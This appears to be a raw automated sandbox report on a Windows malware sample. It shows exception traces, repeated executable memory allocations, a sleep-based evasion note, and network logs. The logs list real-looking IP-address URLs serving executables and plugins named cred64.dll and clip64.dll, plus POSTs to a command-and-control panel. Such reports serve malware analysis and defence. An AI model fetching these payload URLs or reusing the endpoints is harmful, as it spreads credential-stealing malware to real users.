RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

  instruction: leave (c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b)  symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727  module: KERNELBASE.dll  exception_code: 0x80040155  offset: 46887  address: 0x7559b727
  registers: esp=71818224 edi=1974991376 eax=71818224 ebp=71818304 edx=1 ebx=5460556 esi=2147746133 ecx=2082696782  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489052 edi=11362444 eax=0 ebp=2489080 edx=2 ebx=40579916 esi=5 ecx=40579916  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489052 edi=2489052 eax=0 ebp=2489080 edx=0 ebx=10773018 esi=0 ecx=2489260  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489052 edi=2489052 eax=0 ebp=2489080 edx=0 ebx=10772975 esi=0 ecx=2489260  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489052 edi=2489052 eax=0 ebp=2489080 edx=2 ebx=10772975 esi=0 ecx=2489260  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489052 edi=2489052 eax=0 ebp=2489080 edx=0 ebx=10773018 esi=0 ecx=2489260  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bcb9e @ 0xadcb9e | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489052 edi=2489052 eax=0 ebp=2489080 edx=2 ebx=10772975 esi=0 ecx=2489260  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489004 edi=11362444 eax=0 ebp=2489032 edx=2 ebx=5832704 esi=10027008 ecx=10027008  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=0 ebx=10773018 esi=0 ecx=2489040  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfb4a @ 0xadfb4a | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=2 ebx=10772975 esi=0 ecx=2489040  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489004 edi=11362444 eax=0 ebp=2489032 edx=2 ebx=5832704 esi=10027008 ecx=2489032  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=0 ebx=10773018 esi=0 ecx=2489040  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfcf8 @ 0xadfcf8 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=0 ebx=10772975 esi=0 ecx=2489040  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfdf2 @ 0xadfdf2 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489004 edi=11362444 eax=0 ebp=2489032 edx=2 ebx=5832704 esi=10027008 ecx=3081205410  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfdf2 @ 0xadfdf2 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: ud2 (0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x126204  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc000001d  offset: 1204740  address: 0xa46204
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=2 ebx=10773018 esi=0 ecx=2489040  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfe88 @ 0xadfe88 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489004 edi=11362444 eax=0 ebp=2489032 edx=0 ebx=5832704 esi=10027008 ecx=1595858424  |  1 0 0

__exception__  stacktrace: n6p8x5rop5bchcdpw23f+0x1bfe88 @ 0xadfe88 | n6p8x5rop5bchcdpw23f+0x1bddff @ 0xadddff | n6p8x5rop5bchcdpw23f+0x1498dc @ 0xa698dc
  instruction: div eax (f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb)  symbol: n6p8x5rop5bchcdpw23f+0x1261d9  module: n6P8X5rop5bCHCDpw23f.exe  exception_code: 0xc0000094  offset: 1204697  address: 0xa461d9
  registers: esp=2489004 edi=2489004 eax=0 ebp=2489032 edx=0 ebx=10772975 esi=0 ecx=2489040  |  1 0 0
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request HEAD http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/nika.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/nika.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.68/theme/index.php
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/vimu.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/latestrocki.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/networ.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/networ.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://87.251.77.166/SetupPowerGREPDemo.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.109/syncUpd.exe
request HEAD http://109.107.182.3/cost/go.exe
request GET http://109.107.182.3/cost/go.exe
request HEAD http://185.215.113.68/mine/amer.exe
request GET http://185.215.113.68/mine/amer.exe
request HEAD http://109.107.182.3/cost/nika.exe
request GET http://109.107.182.3/cost/nika.exe
request POST http://185.215.113.68/theme/index.php
request HEAD http://109.107.182.3/cost/vimu.exe
request GET http://109.107.182.3/cost/vimu.exe
request GET http://185.172.128.19/latestrocki.exe
request HEAD http://109.107.182.3/cost/networ.exe
request GET http://109.107.182.3/cost/networ.exe
request GET http://87.251.77.166/SetupPowerGREPDemo.exe
request GET http://185.215.113.68/theme/Plugins/cred64.dll
request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
request GET http://185.215.113.68/theme/Plugins/clip64.dll
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://185.172.128.109/syncUpd.exe
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://db-ip.com/demo/home.php?s=175.208.134.152
request GET https://accounts.google.com/
request GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp0prvDtaojbUs_fFiN9b9CD7hkEJ1nHDhTfd9vIUqM3YxyI4uMpGixUZhaFGRKzHsJvSPCU
request GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp19ppAsRv2o6lyozUloXtl2vtHTQ_Z5hQtp6-dWz_Yb_d5Sog8ygYecStquNLy1xgWdXfMz&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-955853393%3A1705964159222861
request GET https://accounts.google.com/_/bscframe
request GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request GET https://accounts.google.com/favicon.ico
request GET https://www.google.com/favicon.ico
request GET https://accounts.google.com/generate_204?dNjB8g
request POST http://185.215.113.68/theme/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 2936832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ef0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00770000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ef4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ef4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 475136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1792
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2724
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 15405056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73423000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734c7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76af9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75ac2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75602000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x713e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2856
region_size: 6950912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02270000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02910000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7564f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7561c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7563c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73423000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734c7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76af9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75ac2000
process_handle: 0xffffffff
1 0 0
description explorhe.exe tried to sleep 266 seconds, actually delayed analysis time by 266 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
